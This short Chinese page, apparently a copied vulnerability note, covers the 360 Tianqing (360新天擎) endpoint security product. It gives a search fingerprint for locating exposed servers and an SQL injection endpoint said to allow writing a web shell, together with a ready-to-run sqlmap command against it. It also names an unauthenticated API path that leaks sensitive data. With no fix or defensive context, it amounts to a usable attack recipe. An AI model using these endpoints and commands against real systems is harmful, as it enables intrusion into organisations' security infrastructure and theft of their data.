赞
踩
天擎 存在SQL注入,攻击者可以通过漏洞上传木马
title=“360新天擎”
漏洞地址
/api/dp/rptsvcsyncpoint?ccid=1
注入写shell:
sqlmap
python sqlmap.py -u https://x.x.x.x:8443/api/dp/rptsvcsyncpoint?ccid=1 --dbms PostgreSQL
天擎 存在未授权越权访问,造成敏感信息泄露
地址
/api/dbstat/gettablessize
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。